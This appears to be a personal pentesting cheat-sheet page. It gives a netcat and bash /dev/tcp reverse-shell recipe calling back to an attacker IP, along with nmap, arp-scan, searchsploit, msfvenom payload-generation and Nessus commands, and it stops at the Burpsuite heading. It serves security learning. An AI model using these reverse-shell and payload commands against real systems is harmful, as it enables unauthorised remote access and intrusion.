
<!doctype html>
<html lang="en" class="no-js">
  <head>
    
      <meta charset="utf-8">
      <meta name="viewport" content="width=device-width,initial-scale=1">
      
      
      
      
        <link rel="prev" href="../VulnerabilityWeb/">
      
      
        <link rel="next" href="../../../es/">
      
      
      <link rel="icon" href="../../../assets/images/favicon.png">
      <meta name="generator" content="mkdocs-1.6.1, mkdocs-material-9.6.18">
    
    
      
        <title>Pentesting tools - InfoSec & Dev by Isaías</title>
      
    
    
      <link rel="stylesheet" href="../../../assets/stylesheets/main.7e37652d.min.css">
      
        
        <link rel="stylesheet" href="../../../assets/stylesheets/palette.06af60db.min.css">
      
      


    
    
      
    
    
      
        
        
        <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
        <link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Roboto:300,300i,400,400i,700,700i%7CRoboto+Mono:400,400i,700,700i&display=fallback">
        <style>:root{--md-text-font:"Roboto";--md-code-font:"Roboto Mono"}</style>
      
    
    
    <script>__md_scope=new URL("../../..",location),__md_hash=e=>[...e].reduce(((e,_)=>(e<<5)-e+_.charCodeAt(0)),0),__md_get=(e,_=localStorage,t=__md_scope)=>JSON.parse(_.getItem(t.pathname+"."+e)),__md_set=(e,_,t=localStorage,a=__md_scope)=>{try{t.setItem(a.pathname+"."+e,JSON.stringify(_))}catch(e){}}</script>
    
      

    
    
    
  </head>
  
  
    
    
      
    
    
    
    
    <body dir="ltr" data-md-color-scheme="default" data-md-color-primary="indigo" data-md-color-accent="pink">
  
    
    <input class="md-toggle" data-md-toggle="drawer" type="checkbox" id="__drawer" autocomplete="off">
    <input class="md-toggle" data-md-toggle="search" type="checkbox" id="__search" autocomplete="off">
    <label class="md-overlay" for="__drawer"></label>
    <div data-md-component="skip">
      
        
        <a href="#pentesting-tools" class="md-skip">
          Skip to content
        </a>
      
    </div>
    <div data-md-component="announce">
      
    </div>
    
    
      

<header class="md-header" data-md-component="header">
  <nav class="md-header__inner md-grid" aria-label="Header">
    <a href="../../.." title="InfoSec &amp; Dev by Isaías" class="md-header__button md-logo" aria-label="InfoSec & Dev by Isaías" data-md-component="logo">
      
  
  <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M12 8a3 3 0 0 0 3-3 3 3 0 0 0-3-3 3 3 0 0 0-3 3 3 3 0 0 0 3 3m0 3.54C9.64 9.35 6.5 8 3 8v11c3.5 0 6.64 1.35 9 3.54 2.36-2.19 5.5-3.54 9-3.54V8c-3.5 0-6.64 1.35-9 3.54"/></svg>

    </a>
    <label class="md-header__button md-icon" for="__drawer">
      
      <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M3 6h18v2H3zm0 5h18v2H3zm0 5h18v2H3z"/></svg>
    </label>
    <div class="md-header__title" data-md-component="header-title">
      <div class="md-header__ellipsis">
        <div class="md-header__topic">
          <span class="md-ellipsis">
            InfoSec & Dev by Isaías
          </span>
        </div>
        <div class="md-header__topic" data-md-component="header-topic">
          <span class="md-ellipsis">
            
              Pentesting tools
            
          </span>
        </div>
      </div>
    </div>
    
      
        <form class="md-header__option" data-md-component="palette">
  
    
    
    
    <input class="md-option" data-md-color-media="" data-md-color-scheme="default" data-md-color-primary="indigo" data-md-color-accent="pink"  aria-label="Cambiar a modo oscuro"  type="radio" name="__palette" id="__palette_0">
    
      <label class="md-header__button md-icon" title="Cambiar a modo oscuro" for="__palette_1" hidden>
        <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="m17.75 4.09-2.53 1.94.91 3.06-2.63-1.81-2.63 1.81.91-3.06-2.53-1.94L12.44 4l1.06-3 1.06 3zm3.5 6.91-1.64 1.25.59 1.98-1.7-1.17-1.7 1.17.59-1.98L15.75 11l2.06-.05L18.5 9l.69 1.95zm-2.28 4.95c.83-.08 1.72 1.1 1.19 1.85-.32.45-.66.87-1.08 1.27C15.17 23 8.84 23 4.94 19.07c-3.91-3.9-3.91-10.24 0-14.14.4-.4.82-.76 1.27-1.08.75-.53 1.93.36 1.85 1.19-.27 2.86.69 5.83 2.89 8.02a9.96 9.96 0 0 0 8.02 2.89m-1.64 2.02a12.08 12.08 0 0 1-7.8-3.47c-2.17-2.19-3.33-5-3.49-7.82-2.81 3.14-2.7 7.96.31 10.98 3.02 3.01 7.84 3.12 10.98.31"/></svg>
      </label>
    
  
    
    
    
    <input class="md-option" data-md-color-media="" data-md-color-scheme="slate" data-md-color-primary="indigo" data-md-color-accent="pink"  aria-label="Cambiar a modo claro"  type="radio" name="__palette" id="__palette_1">
    
      <label class="md-header__button md-icon" title="Cambiar a modo claro" for="__palette_0" hidden>
        <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M12 7a5 5 0 0 1 5 5 5 5 0 0 1-5 5 5 5 0 0 1-5-5 5 5 0 0 1 5-5m0 2a3 3 0 0 0-3 3 3 3 0 0 0 3 3 3 3 0 0 0 3-3 3 3 0 0 0-3-3m0-7 2.39 3.42C13.65 5.15 12.84 5 12 5s-1.65.15-2.39.42zM3.34 7l4.16-.35A7.2 7.2 0 0 0 5.94 8.5c-.44.74-.69 1.5-.83 2.29zm.02 10 1.76-3.77a7.131 7.131 0 0 0 2.38 4.14zM20.65 7l-1.77 3.79a7.02 7.02 0 0 0-2.38-4.15zm-.01 10-4.14.36c.59-.51 1.12-1.14 1.54-1.86.42-.73.69-1.5.83-2.29zM12 22l-2.41-3.44c.74.27 1.55.44 2.41.44.82 0 1.63-.17 2.37-.44z"/></svg>
      </label>
    
  
</form>
      
    
    
      <script>var palette=__md_get("__palette");if(palette&&palette.color){if("(prefers-color-scheme)"===palette.color.media){var media=matchMedia("(prefers-color-scheme: light)"),input=document.querySelector(media.matches?"[data-md-color-media='(prefers-color-scheme: light)']":"[data-md-color-media='(prefers-color-scheme: dark)']");palette.color.media=input.getAttribute("data-md-color-media"),palette.color.scheme=input.getAttribute("data-md-color-scheme"),palette.color.primary=input.getAttribute("data-md-color-primary"),palette.color.accent=input.getAttribute("data-md-color-accent")}for(var[key,value]of Object.entries(palette.color))document.body.setAttribute("data-md-color-"+key,value)}</script>
    
    
    
      
      
        <label class="md-header__button md-icon" for="__search">
          
          <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M9.5 3A6.5 6.5 0 0 1 16 9.5c0 1.61-.59 3.09-1.56 4.23l.27.27h.79l5 5-1.5 1.5-5-5v-.79l-.27-.27A6.52 6.52 0 0 1 9.5 16 6.5 6.5 0 0 1 3 9.5 6.5 6.5 0 0 1 9.5 3m0 2C7 5 5 7 5 9.5S7 14 9.5 14 14 12 14 9.5 12 5 9.5 5"/></svg>
        </label>
        <div class="md-search" data-md-component="search" role="dialog">
  <label class="md-search__overlay" for="__search"></label>
  <div class="md-search__inner" role="search">
    <form class="md-search__form" name="search">
      <input type="text" class="md-search__input" name="query" aria-label="Search" placeholder="Search" autocapitalize="off" autocorrect="off" autocomplete="off" spellcheck="false" data-md-component="search-query" required>
      <label class="md-search__icon md-icon" for="__search">
        
        <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M9.5 3A6.5 6.5 0 0 1 16 9.5c0 1.61-.59 3.09-1.56 4.23l.27.27h.79l5 5-1.5 1.5-5-5v-.79l-.27-.27A6.52 6.52 0 0 1 9.5 16 6.5 6.5 0 0 1 3 9.5 6.5 6.5 0 0 1 9.5 3m0 2C7 5 5 7 5 9.5S7 14 9.5 14 14 12 14 9.5 12 5 9.5 5"/></svg>
        
        <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M20 11v2H8l5.5 5.5-1.42 1.42L4.16 12l7.92-7.92L13.5 5.5 8 11z"/></svg>
      </label>
      <nav class="md-search__options" aria-label="Search">
        
        <button type="reset" class="md-search__icon md-icon" title="Clear" aria-label="Clear" tabindex="-1">
          
          <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M19 6.41 17.59 5 12 10.59 6.41 5 5 6.41 10.59 12 5 17.59 6.41 19 12 13.41 17.59 19 19 17.59 13.41 12z"/></svg>
        </button>
      </nav>
      
    </form>
    <div class="md-search__output">
      <div class="md-search__scrollwrap" tabindex="0" data-md-scrollfix>
        <div class="md-search-result" data-md-component="search-result">
          <div class="md-search-result__meta">
            Initializing search
          </div>
          <ol class="md-search-result__list" role="presentation"></ol>
        </div>
      </div>
    </div>
  </div>
</div>
      
    
    
      <div class="md-header__source">
        <a href="https://github.com/godack1905" title="Go to repository" class="md-source" data-md-component="source">
  <div class="md-source__icon md-icon">
    
    <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 448 512"><!--! Font Awesome Free 7.0.0 by @fontawesome - https://fontawesome.com License - https://fontawesome.com/license/free (Icons: CC BY 4.0, Fonts: SIL OFL 1.1, Code: MIT License) Copyright 2025 Fonticons, Inc.--><path fill="currentColor" d="M439.6 236.1 244 40.5c-5.4-5.5-12.8-8.5-20.4-8.5s-15 3-20.4 8.4L162.5 81l51.5 51.5c27.1-9.1 52.7 16.8 43.4 43.7l49.7 49.7c34.2-11.8 61.2 31 35.5 56.7-26.5 26.5-70.2-2.9-56-37.3L240.3 199v121.9c25.3 12.5 22.3 41.8 9.1 55-6.4 6.4-15.2 10.1-24.3 10.1s-17.8-3.6-24.3-10.1c-17.6-17.6-11.1-46.9 11.2-56v-123c-20.8-8.5-24.6-30.7-18.6-45L142.6 101 8.5 235.1C3 240.6 0 247.9 0 255.5s3 15 8.5 20.4l195.6 195.7c5.4 5.4 12.7 8.4 20.4 8.4s15-3 20.4-8.4l194.7-194.7c5.4-5.4 8.4-12.8 8.4-20.4s-3-15-8.4-20.4"/></svg>
  </div>
  <div class="md-source__repository">
    GitHub
  </div>
</a>
      </div>
    
  </nav>
  
</header>
    
    <div class="md-container" data-md-component="container">
      
      
        
          
            
<nav class="md-tabs" aria-label="Tabs" data-md-component="tabs">
  <div class="md-grid">
    <ul class="md-tabs__list">
      
        
  
  
  
    
  
  
    
    
      <li class="md-tabs__item md-tabs__item--active">
        <a href="../../" class="md-tabs__link">
          
  
  
  English

        </a>
      </li>
    
  

      
        
  
  
  
  
    
    
      <li class="md-tabs__item">
        <a href="../../../es/" class="md-tabs__link">
          
  
  
  Español

        </a>
      </li>
    
  

      
    </ul>
  </div>
</nav>
          
        
      
      <main class="md-main" data-md-component="main">
        <div class="md-main__inner md-grid">
          
            
              
              <div class="md-sidebar md-sidebar--primary" data-md-component="sidebar" data-md-type="navigation" >
                <div class="md-sidebar__scrollwrap">
                  <div class="md-sidebar__inner">
                    


  


<nav class="md-nav md-nav--primary md-nav--lifted" aria-label="Navigation" data-md-level="0">
  <label class="md-nav__title" for="__drawer">
    <a href="../../.." title="InfoSec &amp; Dev by Isaías" class="md-nav__button md-logo" aria-label="InfoSec & Dev by Isaías" data-md-component="logo">
      
  
  <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M12 8a3 3 0 0 0 3-3 3 3 0 0 0-3-3 3 3 0 0 0-3 3 3 3 0 0 0 3 3m0 3.54C9.64 9.35 6.5 8 3 8v11c3.5 0 6.64 1.35 9 3.54 2.36-2.19 5.5-3.54 9-3.54V8c-3.5 0-6.64 1.35-9 3.54"/></svg>

    </a>
    InfoSec & Dev by Isaías
  </label>
  
    <div class="md-nav__source">
      <a href="https://github.com/godack1905" title="Go to repository" class="md-source" data-md-component="source">
  <div class="md-source__icon md-icon">
    
    <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 448 512"><!--! Font Awesome Free 7.0.0 by @fontawesome - https://fontawesome.com License - https://fontawesome.com/license/free (Icons: CC BY 4.0, Fonts: SIL OFL 1.1, Code: MIT License) Copyright 2025 Fonticons, Inc.--><path fill="currentColor" d="M439.6 236.1 244 40.5c-5.4-5.5-12.8-8.5-20.4-8.5s-15 3-20.4 8.4L162.5 81l51.5 51.5c27.1-9.1 52.7 16.8 43.4 43.7l49.7 49.7c34.2-11.8 61.2 31 35.5 56.7-26.5 26.5-70.2-2.9-56-37.3L240.3 199v121.9c25.3 12.5 22.3 41.8 9.1 55-6.4 6.4-15.2 10.1-24.3 10.1s-17.8-3.6-24.3-10.1c-17.6-17.6-11.1-46.9 11.2-56v-123c-20.8-8.5-24.6-30.7-18.6-45L142.6 101 8.5 235.1C3 240.6 0 247.9 0 255.5s3 15 8.5 20.4l195.6 195.7c5.4 5.4 12.7 8.4 20.4 8.4s15-3 20.4-8.4l194.7-194.7c5.4-5.4 8.4-12.8 8.4-20.4s-3-15-8.4-20.4"/></svg>
  </div>
  <div class="md-source__repository">
    GitHub
  </div>
</a>
    </div>
  
  <ul class="md-nav__list" data-md-scrollfix>
    
      
      
  
  
    
  
  
  
    
    
    
    
      
        
        
      
      
    
    
    <li class="md-nav__item md-nav__item--active md-nav__item--section md-nav__item--nested">
      
        
        
        <input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_1" checked>
        
          
          <label class="md-nav__link" for="__nav_1" id="__nav_1_label" tabindex="">
            
  
  
  <span class="md-ellipsis">
    English
    
  </span>
  

            <span class="md-nav__icon md-icon"></span>
          </label>
        
        <nav class="md-nav" data-md-level="1" aria-labelledby="__nav_1_label" aria-expanded="true">
          <label class="md-nav__title" for="__nav_1">
            <span class="md-nav__icon md-icon"></span>
            English
          </label>
          <ul class="md-nav__list" data-md-scrollfix>
            
              
                
  
  
  
  
    <li class="md-nav__item">
      <a href="../../" class="md-nav__link">
        
  
  
  <span class="md-ellipsis">
    Home
    
  </span>
  

      </a>
    </li>
  

              
            
              
                
  
  
  
  
    
    
    
    
      
      
    
    
    <li class="md-nav__item md-nav__item--nested">
      
        
        
        <input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_1_2" >
        
          
          <label class="md-nav__link" for="__nav_1_2" id="__nav_1_2_label" tabindex="0">
            
  
  
  <span class="md-ellipsis">
    Writeups
    
  </span>
  

            <span class="md-nav__icon md-icon"></span>
          </label>
        
        <nav class="md-nav" data-md-level="2" aria-labelledby="__nav_1_2_label" aria-expanded="false">
          <label class="md-nav__title" for="__nav_1_2">
            <span class="md-nav__icon md-icon"></span>
            Writeups
          </label>
          <ul class="md-nav__list" data-md-scrollfix>
            
              
                
  
  
  
  
    <li class="md-nav__item">
      <a href="../../writeups/FirstHacking/" class="md-nav__link">
        
  
  
  <span class="md-ellipsis">
    First Hacking
    
  </span>
  

      </a>
    </li>
  

              
            
              
                
  
  
  
  
    <li class="md-nav__item">
      <a href="../../writeups/Injection/" class="md-nav__link">
        
  
  
  <span class="md-ellipsis">
    Injection
    
  </span>
  

      </a>
    </li>
  

              
            
              
                
  
  
  
  
    <li class="md-nav__item">
      <a href="../../writeups/Trust/" class="md-nav__link">
        
  
  
  <span class="md-ellipsis">
    Trust
    
  </span>
  

      </a>
    </li>
  

              
            
              
                
  
  
  
  
    <li class="md-nav__item">
      <a href="../../writeups/Obsession/" class="md-nav__link">
        
  
  
  <span class="md-ellipsis">
    Obsession
    
  </span>
  

      </a>
    </li>
  

              
            
          </ul>
        </nav>
      
    </li>
  

              
            
              
                
  
  
    
  
  
  
    
    
    
    
      
      
    
    
    <li class="md-nav__item md-nav__item--active md-nav__item--nested">
      
        
        
        <input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_1_3" checked>
        
          
          <label class="md-nav__link" for="__nav_1_3" id="__nav_1_3_label" tabindex="0">
            
  
  
  <span class="md-ellipsis">
    Notes
    
  </span>
  

            <span class="md-nav__icon md-icon"></span>
          </label>
        
        <nav class="md-nav" data-md-level="2" aria-labelledby="__nav_1_3_label" aria-expanded="true">
          <label class="md-nav__title" for="__nav_1_3">
            <span class="md-nav__icon md-icon"></span>
            Notes
          </label>
          <ul class="md-nav__list" data-md-scrollfix>
            
              
                
  
  
  
  
    <li class="md-nav__item">
      <a href="../VulnerabilityWeb/" class="md-nav__link">
        
  
  
  <span class="md-ellipsis">
    Most common vulnerabilities
    
  </span>
  

      </a>
    </li>
  

              
            
              
                
  
  
    
  
  
  
    <li class="md-nav__item md-nav__item--active">
      
      <input class="md-nav__toggle md-toggle" type="checkbox" id="__toc">
      
      
        
      
      
        <label class="md-nav__link md-nav__link--active" for="__toc">
          
  
  
  <span class="md-ellipsis">
    Pentesting tools
    
  </span>
  

          <span class="md-nav__icon md-icon"></span>
        </label>
      
      <a href="./" class="md-nav__link md-nav__link--active">
        
  
  
  <span class="md-ellipsis">
    Pentesting tools
    
  </span>
  

      </a>
      
        

<nav class="md-nav md-nav--secondary" aria-label="Table of contents">
  
  
  
    
  
  
    <label class="md-nav__title" for="__toc">
      <span class="md-nav__icon md-icon"></span>
      Table of contents
    </label>
    <ul class="md-nav__list" data-md-component="toc" data-md-scrollfix>
      
        <li class="md-nav__item">
  <a href="#0-how-to-obtain-a-reverse-shell" class="md-nav__link">
    <span class="md-ellipsis">
      0. How to Obtain a Reverse Shell
    </span>
  </a>
  
</li>
      
        <li class="md-nav__item">
  <a href="#1-arp-scan" class="md-nav__link">
    <span class="md-ellipsis">
      1. arp-scan
    </span>
  </a>
  
</li>
      
        <li class="md-nav__item">
  <a href="#2-nmap" class="md-nav__link">
    <span class="md-ellipsis">
      2. nmap
    </span>
  </a>
  
    <nav class="md-nav" aria-label="2. nmap">
      <ul class="md-nav__list">
        
          <li class="md-nav__item">
  <a href="#21-port-enumeration" class="md-nav__link">
    <span class="md-ellipsis">
      2.1. Port Enumeration
    </span>
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#22-detailed-port-scan" class="md-nav__link">
    <span class="md-ellipsis">
      2.2. Detailed Port Scan
    </span>
  </a>
  
</li>
        
      </ul>
    </nav>
  
</li>
      
        <li class="md-nav__item">
  <a href="#3-searchsploits" class="md-nav__link">
    <span class="md-ellipsis">
      3. Searchsploits
    </span>
  </a>
  
</li>
      
        <li class="md-nav__item">
  <a href="#4-msfvenom" class="md-nav__link">
    <span class="md-ellipsis">
      4. Msfvenom
    </span>
  </a>
  
</li>
      
        <li class="md-nav__item">
  <a href="#5-nessus" class="md-nav__link">
    <span class="md-ellipsis">
      5. Nessus
    </span>
  </a>
  
</li>
      
        <li class="md-nav__item">
  <a href="#6-burpsuite" class="md-nav__link">
    <span class="md-ellipsis">
      6. Burpsuite
    </span>
  </a>
  
</li>
      
        <li class="md-nav__item">
  <a href="#7-gobuster" class="md-nav__link">
    <span class="md-ellipsis">
      7. Gobuster
    </span>
  </a>
  
</li>
      
        <li class="md-nav__item">
  <a href="#8-hash-identifier-john-the-ripper" class="md-nav__link">
    <span class="md-ellipsis">
      8. Hash-identifier + John The Ripper
    </span>
  </a>
  
</li>
      
        <li class="md-nav__item">
  <a href="#9-hydra" class="md-nav__link">
    <span class="md-ellipsis">
      9. Hydra
    </span>
  </a>
  
</li>
      
    </ul>
  
</nav>
      
    </li>
  

              
            
          </ul>
        </nav>
      
    </li>
  

              
            
          </ul>
        </nav>
      
    </li>
  

    
      
      
  
  
  
  
    
    
    
    
      
      
    
    
    <li class="md-nav__item md-nav__item--nested">
      
        
        
        <input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_2" >
        
          
          <label class="md-nav__link" for="__nav_2" id="__nav_2_label" tabindex="0">
            
  
  
  <span class="md-ellipsis">
    Español
    
  </span>
  

            <span class="md-nav__icon md-icon"></span>
          </label>
        
        <nav class="md-nav" data-md-level="1" aria-labelledby="__nav_2_label" aria-expanded="false">
          <label class="md-nav__title" for="__nav_2">
            <span class="md-nav__icon md-icon"></span>
            Español
          </label>
          <ul class="md-nav__list" data-md-scrollfix>
            
              
                
  
  
  
  
    <li class="md-nav__item">
      <a href="../../../es/" class="md-nav__link">
        
  
  
  <span class="md-ellipsis">
    Inicio
    
  </span>
  

      </a>
    </li>
  

              
            
              
                
  
  
  
  
    
    
    
    
      
      
    
    
    <li class="md-nav__item md-nav__item--nested">
      
        
        
        <input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_2_2" >
        
          
          <label class="md-nav__link" for="__nav_2_2" id="__nav_2_2_label" tabindex="0">
            
  
  
  <span class="md-ellipsis">
    Writeups
    
  </span>
  

            <span class="md-nav__icon md-icon"></span>
          </label>
        
        <nav class="md-nav" data-md-level="2" aria-labelledby="__nav_2_2_label" aria-expanded="false">
          <label class="md-nav__title" for="__nav_2_2">
            <span class="md-nav__icon md-icon"></span>
            Writeups
          </label>
          <ul class="md-nav__list" data-md-scrollfix>
            
              
                
  
  
  
  
    <li class="md-nav__item">
      <a href="../../../es/writeups/FirstHacking/" class="md-nav__link">
        
  
  
  <span class="md-ellipsis">
    First Hacking
    
  </span>
  

      </a>
    </li>
  

              
            
              
                
  
  
  
  
    <li class="md-nav__item">
      <a href="../../../es/writeups/Injection/" class="md-nav__link">
        
  
  
  <span class="md-ellipsis">
    Injection
    
  </span>
  

      </a>
    </li>
  

              
            
              
                
  
  
  
  
    <li class="md-nav__item">
      <a href="../../../es/writeups/Trust/" class="md-nav__link">
        
  
  
  <span class="md-ellipsis">
    Trust
    
  </span>
  

      </a>
    </li>
  

              
            
              
                
  
  
  
  
    <li class="md-nav__item">
      <a href="../../../es/writeups/Obsession/" class="md-nav__link">
        
  
  
  <span class="md-ellipsis">
    Obsession
    
  </span>
  

      </a>
    </li>
  

              
            
          </ul>
        </nav>
      
    </li>
  

              
            
              
                
  
  
  
  
    
    
    
    
      
      
    
    
    <li class="md-nav__item md-nav__item--nested">
      
        
        
        <input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_2_3" >
        
          
          <label class="md-nav__link" for="__nav_2_3" id="__nav_2_3_label" tabindex="0">
            
  
  
  <span class="md-ellipsis">
    Apuntes
    
  </span>
  

            <span class="md-nav__icon md-icon"></span>
          </label>
        
        <nav class="md-nav" data-md-level="2" aria-labelledby="__nav_2_3_label" aria-expanded="false">
          <label class="md-nav__title" for="__nav_2_3">
            <span class="md-nav__icon md-icon"></span>
            Apuntes
          </label>
          <ul class="md-nav__list" data-md-scrollfix>
            
              
                
  
  
  
  
    <li class="md-nav__item">
      <a href="../../../es/notes/VulnerabilityWeb/" class="md-nav__link">
        
  
  
  <span class="md-ellipsis">
    Vulnerabilidades web mas comunes
    
  </span>
  

      </a>
    </li>
  

              
            
              
                
  
  
  
  
    <li class="md-nav__item">
      <a href="../../../es/notes/Tools/" class="md-nav__link">
        
  
  
  <span class="md-ellipsis">
    Herramientas de pentesting
    
  </span>
  

      </a>
    </li>
  

              
            
          </ul>
        </nav>
      
    </li>
  

              
            
          </ul>
        </nav>
      
    </li>
  

    
  </ul>
</nav>
                  </div>
                </div>
              </div>
            
            
              
              <div class="md-sidebar md-sidebar--secondary" data-md-component="sidebar" data-md-type="toc" >
                <div class="md-sidebar__scrollwrap">
                  <div class="md-sidebar__inner">
                    

<nav class="md-nav md-nav--secondary" aria-label="Table of contents">
  
  
  
    
  
  
    <label class="md-nav__title" for="__toc">
      <span class="md-nav__icon md-icon"></span>
      Table of contents
    </label>
    <ul class="md-nav__list" data-md-component="toc" data-md-scrollfix>
      
        <li class="md-nav__item">
  <a href="#0-how-to-obtain-a-reverse-shell" class="md-nav__link">
    <span class="md-ellipsis">
      0. How to Obtain a Reverse Shell
    </span>
  </a>
  
</li>
      
        <li class="md-nav__item">
  <a href="#1-arp-scan" class="md-nav__link">
    <span class="md-ellipsis">
      1. arp-scan
    </span>
  </a>
  
</li>
      
        <li class="md-nav__item">
  <a href="#2-nmap" class="md-nav__link">
    <span class="md-ellipsis">
      2. nmap
    </span>
  </a>
  
    <nav class="md-nav" aria-label="2. nmap">
      <ul class="md-nav__list">
        
          <li class="md-nav__item">
  <a href="#21-port-enumeration" class="md-nav__link">
    <span class="md-ellipsis">
      2.1. Port Enumeration
    </span>
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#22-detailed-port-scan" class="md-nav__link">
    <span class="md-ellipsis">
      2.2. Detailed Port Scan
    </span>
  </a>
  
</li>
        
      </ul>
    </nav>
  
</li>
      
        <li class="md-nav__item">
  <a href="#3-searchsploits" class="md-nav__link">
    <span class="md-ellipsis">
      3. Searchsploits
    </span>
  </a>
  
</li>
      
        <li class="md-nav__item">
  <a href="#4-msfvenom" class="md-nav__link">
    <span class="md-ellipsis">
      4. Msfvenom
    </span>
  </a>
  
</li>
      
        <li class="md-nav__item">
  <a href="#5-nessus" class="md-nav__link">
    <span class="md-ellipsis">
      5. Nessus
    </span>
  </a>
  
</li>
      
        <li class="md-nav__item">
  <a href="#6-burpsuite" class="md-nav__link">
    <span class="md-ellipsis">
      6. Burpsuite
    </span>
  </a>
  
</li>
      
        <li class="md-nav__item">
  <a href="#7-gobuster" class="md-nav__link">
    <span class="md-ellipsis">
      7. Gobuster
    </span>
  </a>
  
</li>
      
        <li class="md-nav__item">
  <a href="#8-hash-identifier-john-the-ripper" class="md-nav__link">
    <span class="md-ellipsis">
      8. Hash-identifier + John The Ripper
    </span>
  </a>
  
</li>
      
        <li class="md-nav__item">
  <a href="#9-hydra" class="md-nav__link">
    <span class="md-ellipsis">
      9. Hydra
    </span>
  </a>
  
</li>
      
    </ul>
  
</nav>
                  </div>
                </div>
              </div>
            
          
          
            <div class="md-content" data-md-component="content">
              <article class="md-content__inner md-typeset">
                
                  


  
  


<h1 id="pentesting-tools">Pentesting Tools</h1>
<h2 id="0-how-to-obtain-a-reverse-shell">0. How to Obtain a <em>Reverse Shell</em></h2>
<p>First, run the following command on your terminal to get a raw tty:</p>
<pre><code class="language-bash">nc -nlvp {attacker port}
</code></pre>
<p>This command will listen on the specified port, waiting for the target machine to send a reverse shell.</p>
<ul>
<li>Windows<ol>
<li>Download netcat</li>
<li>Execute:</li>
</ol>
</li>
</ul>
<pre><code class="language-bash">./nc.exe {attacker ip} {nc -nlvp {attacker port} -l cmd.exe
</code></pre>
<ul>
<li>Linux<ol>
<li>Execute:</li>
</ol>
</li>
</ul>
<pre><code class="language-bash">bash -i &gt;&amp; /dev/tcp/{attacker ip}/{attacker port} 0&gt;&amp;1  
</code></pre>
<p>Once you have the reverse shell, to make it fully interactive, run:</p>
<pre><code class="language-bash">script /dev/null -c bash
stty raw -echo; fg
reset xterm
export TERM=xterm
</code></pre>
<p>Now you can interact with a fully functional tty.</p>
<hr />
<h2 id="1-arp-scan">1. <em>arp-scan</em></h2>
<p>The <em>arp-scan</em> is used to scan the network (usually local) to discover the target machine's IP.
Common command:</p>
<pre><code class="language-bash">arp-scan -I {iface} --localnet
</code></pre>
<ul>
<li><strong>iface</strong> is the network interface to scan.</li>
</ul>
<hr />
<h2 id="2-nmap">2. <em>nmap</em></h2>
<p><em>nmap</em> is a versatile tool for port scanning. Some of the most useful scans:</p>
<h3 id="21-port-enumeration">2.1. Port Enumeration</h3>
<p>First scan to list open ports (you can use extractPorts to copy them easily):</p>
<pre><code class="language-bash">nmap -p- --open -sS --min-rate 5000 -vvv -n -Pn {@IP victim} -oG allPorts
</code></pre>
<p>Parameters explained:</p>
<ol>
<li><strong>-p-</strong> → scan all ports</li>
<li><strong>--open</strong> → show only open ports</li>
<li><strong>sS</strong> → stealth SYN scan (which is stealthy because it doesn't do the 3-way handshake)</li>
<li><strong>--min-rate</strong> 5000→ send at least 5000 packets/sec</li>
<li><strong>-vvv</strong> → verbose output</li>
<li><strong>-n</strong> → skip DNS resolution for more velocity</li>
<li><strong>-Pn</strong> → skip host discovery with ping</li>
<li><strong>-oG</strong> allPorts→ save output in greppable format in the file that we specifie (on this case <em>allPorts</em>)</li>
</ol>
<p>Use <em>extractPorts</em> to filter relevant ports:</p>
<pre><code class="language-bash">extractPorts allPorts
</code></pre>
<h3 id="22-detailed-port-scan">2.2. Detailed Port Scan</h3>
<p>After obtaining the list of ports, perform a more thorough scan:</p>
<pre><code class="language-bash">nmap -sCV -p{copied ports} {@victym ip} -oN targeted
</code></pre>
<p>Parameters:</p>
<ol>
<li><strong>-sCV</strong> → the <em>sC</em> parameter executes all the <em>nmap</em> scripts scan, and the <em>V</em> parameters shows also the version of the service that is running.</li>
<li><strong>-p</strong> → specify ports</li>
<li><strong>-oN targeted</strong> → save in normal format for easy reading (on this case to <em>targeted</em>)</li>
</ol>
<p>You now have two files: allPorts (greppable) and targeted (full scan output), that you can simply check whenever you want.</p>
<pre><code class="language-bash">cat -l ruby targeted
</code></pre>
<p>Those scans are the basics, in the future we may need to list closed or filter ports...</p>
<hr />
<h2 id="3-searchsploits">3. Searchsploits</h2>
<p>Useful for finding known vulnerabilities in services:</p>
<pre><code class="language-bash">searchsploits {version &amp; service}
</code></pre>
<p>Always complement with online searches (GitHub, Exploit-DB).</p>
<hr />
<h2 id="4-msfvenom">4. Msfvenom</h2>
<p>This tool is used to generate custom payloads for a wide variety of operating systems and architectures. To do this, the first thing to do is list the payloads and filter them using <em>grep</em> with keywords. The command to list payloads is as follows:</p>
<pre><code class="language-bash">msfvenom -l
</code></pre>
<p>Once we have found the payload that interests us, to save it on our machine we must execute the following command</p>
<pre><code class="language-bash">msfvenom -p {payload} LHOST={@attacker ip} LPORT={listener port} -f {filetype} -o {filename.extension}
</code></pre>
<hr />
<h2 id="5-nessus">5. Nessus</h2>
<p>Another tool for scanning and reporting vulnerabilities is Nessus. Nessus is a service that runs on port 8834 on our computer (localhost) with the HTTPS service. To use it, you must first start the service using</p>
<pre><code class="language-bash">systemctl start nessusd.service
</code></pre>
<p>Once it's running, we need to access https://localhost:8834 using a web browser. Once inside Nessus, to start a new scan, press the "New Scan" button in the upper right corner. This will redirect you to a page with a wide selection of possible scans. The most commonly used ones are:</p>
<ul>
<li>Advanced Scan → It is a slow scan, but it reports potential vulnerabilities.</li>
<li>Host Discovery → very basic scan (not that useful)</li>
</ul>
<hr />
<h2 id="6-burpsuite">6. Burpsuite</h2>
